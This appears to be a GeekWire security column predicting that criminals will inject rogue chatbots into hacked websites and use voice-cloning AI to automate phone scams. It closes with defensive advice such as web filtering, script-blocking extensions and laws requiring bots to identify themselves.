(Pixabay / mohamed_hassan Image)

“Hello, I’m John. Do you need any assistance today?” asks a pop-up window randomly as you browse a shopping site.

If you’ve visited an online shopping, product support, or vendor website in the last few years, you’ve probably noticed more and more ostensibly helpful chatbots popping up, ready to assist your every want and whim. If you remain stagnant on certain websites for a tad too long, a chat dialog window might appear, often accompanied by a friendly picture that could convince you you’re talking to a fellow human. However, in reality you’ve likely encountered an automated chatbot the website has employed to improve its business.

AI-powered chatbots are all the rage among businesses with an online presence these days. They’re advertised to lower support calls by 70 percent and quickly drive visitors to products they want to buy, thus increasing revenue and profits.

If you ask a chatbot a question, it gives you an answer, or at least, refers you to a link where you can find said answer. On the surface, chatbots seem like a win/win proposition; customers quickly resolve their questions and companies spend less time and money on human reps. That said, I think we may be traveling down a primrose path by placing too much faith in machine-learning contraptions.

In 2019, I predict cybercriminals will turn AI chatbots against us.

2019: A new year for potentially bad chatbots

Near the end of every year, my team and I try to predict how cyber attackers will adjust their malware and digital assaults during the upcoming year. This year, we predicted an AI-driven chatbot will go rogue. Unlike many of our predictions, which are based on quantifiable trends we see in the threat landscape, this prediction was sparked by a gut feeling we got from considering the accelerated evolution of AI technology paired with cybercriminals’ history of social engineering.

I see two versions of this rogue chatbot prediction: near-term and longer-term. Let’s explore both.

In the near-term — literally, next year — we predict a malicious hacker will inject a fake text chatbot into a legitimate website to help them socially engineer visitors. Since we encounter chatbots much more regularly these days, we have become acclimated to their presence and perhaps less skeptical about them. However, the majority of websites still don’t have one, which leaves chatbots ripe for corruption by cybercriminals.

Here’s how: Many websites suffer from web application vulnerabilities that allow hackers to inject unwanted code. According to one security company, 94 percent of websites suffer from at least one high-severity web application flaw. Cybercriminals can often exploit these types of flaws, such as cross-site scripting (XSS), to add malicious code to otherwise legitimate and trustworthy websites. Leveraging this type of flaw, cybercriminals could add a rogue chatbot to a legitimate site next year.

Imagine a banking website that hasn’t already added a chatbot of its own. If that site also suffers from a web application flaw, a criminal could add a tiny line of code that launches a remote chatbot appearing to come from the bank. When a visitor asks it where to find information about loans or their account, the malicious chatbot could forward the victim to an evil drive-by download site that forces malware onto their computer. Worse yet, the rogue chatbot could socially engineer the victim into sharing banking credentials, giving the attacker access to the visitor’s account.

Adding voice adds more dystopian potential

However, that’s only the near-term prediction; things get even more dystopian when you look ahead five years into the future. So far, we’ve only explored text-based chatbots, but as you know, voice-based digital assistants are also gaining popularity. In the next few years, you’ll be more likely to interact with chatbots verbally than through text. Nothing makes this more obvious than the rapid adoption of Siri, Alexa, Google Assistant, and Cortana.

Recently, one of these digital assistants got an upgrade that, though amazing, really exposes some dark-side potential. During 2018, Google demoed Duplex, a natural language speaking addition to Google Assistant that allows it to carry out non-digital tasks, such as calling a human to set up an appointment.

Now, you’ve heard computers talk in the past and historically that speech has fallen squarely into the uncanny valley. While it’s gotten better over time, something always seems to tip us off that we’re speaking with and listening to a machine. Yet Google’s AI-powered Duplex bucks this trend. It sounds like a person, down to using “um” for transitions. Furthermore, it can carry out a typical dynamic human conversation, following along with digressions, pauses, and changes in topic that computers have previously struggled with. If you haven’t heard this Duplex demo, give it a listen to be both amazed and shaken.

Unfortunately, this new level of voice-enabled AI could bring rogue chatbots to the next level. If you think you’re speaking to a human, you’ll tend to be more trusting than you would with a computer program. Natural language speaking chatbots could help automate and scale cyber scams to a much greater degree.

For example, you might have heard of, or even received, a Microsoft support scam call. Some person randomly calls you claiming to be Microsoft support rep, warning you that they’ve seen unusual activity on your computer. They then try to coerce you into setting up a remote desktop so they can “fix it,” when in reality they’re hijacking your computer. If you ever get such a call, hang up.

In any case, one of the few things holding this sort of phone scam back from achieving broad scale damage has been the fact that a human cybercriminal has to manually call and interact with every single victim. Imagine instead a Duplex-like AI programmed to automate this sort of call. Now cyber criminals can launch thousands of scam attempts at once. It gets worse…

Recently, researchers and companies like Lyrebird have used machine learning and AI to replicate people’s voice or video image. Using as little as 30 recorded sentences, or tons of publicly available video, researchers and attackers alike could make a computer sound like a person you know, and control exactly what the computer chatbot says.

This might allow them to spear phish victims at scale. Imagine calls from “your boss” asking you to make wire transfers and giving you dynamic and believable answers to all your follow up questions. While you may think twice about that $20,000 wire transfer your CEO requested via email, you’d probably react differently if you got a convincing verbal request from your so-called boss.

How to defend yourself against rogue AI chatbots

Now that you’ve imagined our “dark” future full of rogue, AI-powered chatbots, you’re probably wondering how you can avoid or take down “Skynet.” Here’s some practical advice you can use to defend against both near-term and long-term rogue chatbot attacks.

In the near-term, use security products that filter your web traffic for malicious activity. Whether it’s a network security appliance, a DNS firewall, or a host-based security suite, there are products out there that automatically block any malicious web links and IP addresses you might visit. These products prevent you from visiting malicious sites on the Internet, even if you accidentally click on a link sent by a malicious chatbot.

If you’re a power user, I would also recommend browser extensions like NoScript or ScriptSafe. These extensions will prevent any website from running script until you allow it. While they do take a little time to train, they give you a way to prevent legitimate sites from running malicious, injected scripts linking to external domains. In other words, they could prevent a malicious chatbot injected into a legitimate site.

For the long-term, vigilance and regulation are our best hopes. As computers become better at natural speech, even passing the Turing test, automated social engineering attack campaigns will explode. This means we will have to get more alert and skeptical when we speak to new “people,” otherwise we might not realize we’re falling for a computer-driven scam.

On top of that, governments have to enact new laws that force “robots” to announcement themselves before speaking to humans. During Google’s first Duplex test, the voice AI did not identify itself, and you could tell the human recipient was totally unaware they were speaking to a computer. However, during a second demo the AI assistant did identify itself, likely in response to fear of the first demo and new laws like the one in California that require bots to identify themselves.

The AI development and natural language speech improvements this prediction is based upon are innovative and exciting, and I look forward to the continued evolution of voice-controlled and responsive machines. However, like all technology, chatbots offer an equal opportunity for good and evil. You shouldn’t fear AI-powered chatbots, but you should keep a skeptical eye on them, in case they go rogue in the coming year.

Like what you're reading? Subscribe to GeekWire's free newsletters to catch every headline

Job Listings on GeekWork

Find more jobs on GeekWork. Employers, post a job here.